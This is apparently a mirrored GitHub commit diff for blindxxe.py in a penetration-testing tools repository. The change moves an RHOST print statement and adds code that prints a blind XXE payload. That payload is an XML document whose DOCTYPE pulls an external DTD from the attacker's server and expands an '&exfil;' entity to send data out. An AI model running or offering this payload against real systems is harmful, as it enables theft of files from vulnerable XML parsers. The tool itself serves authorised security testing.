mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-25 12:01:37 +01:00
Improved blindxxe.py script (3)
This commit is contained in:
parent
91851b54cc
commit
084d179e71
@ -145,7 +145,6 @@ def fetchRhost():
|
|||||||
global config
|
global config
|
||||||
config['rhost'] = socket.gethostbyname(socket.gethostname())
|
config['rhost'] = socket.gethostbyname(socket.gethostname())
|
||||||
|
|
||||||
print('[>] RHOST set to: {}'.format(config['rhost']))
|
|
||||||
|
|
||||||
def main(argv):
|
def main(argv):
|
||||||
global config
|
global config
|
||||||
@ -160,6 +159,16 @@ def main(argv):
|
|||||||
print('[+] Serving HTTP server on: ("{}", {})'.format(
|
print('[+] Serving HTTP server on: ("{}", {})'.format(
|
||||||
config['listen'], config['port']
|
config['listen'], config['port']
|
||||||
))
|
))
|
||||||
|
print('[+] RHOST set to: {}'.format(config['rhost']))
|
||||||
|
|
||||||
|
print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:')
|
||||||
|
print('''
|
||||||
|
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE foo SYSTEM "http://{}/test.dtd">
|
||||||
|
<foo>&exfil;</foo>
|
||||||
|
|
||||||
|
'''.format(config['rhost']))
|
||||||
|
|
||||||
server = HTTPServer((config['listen'], config['port']), BlindXXEServer)
|
server = HTTPServer((config['listen'], config['port']), BlindXXEServer)
|
||||||
thread = threading.Thread(target=server.serve_forever)
|
thread = threading.Thread(target=server.serve_forever)
|
||||||
|
Loading…
Reference in New Issue
Block a user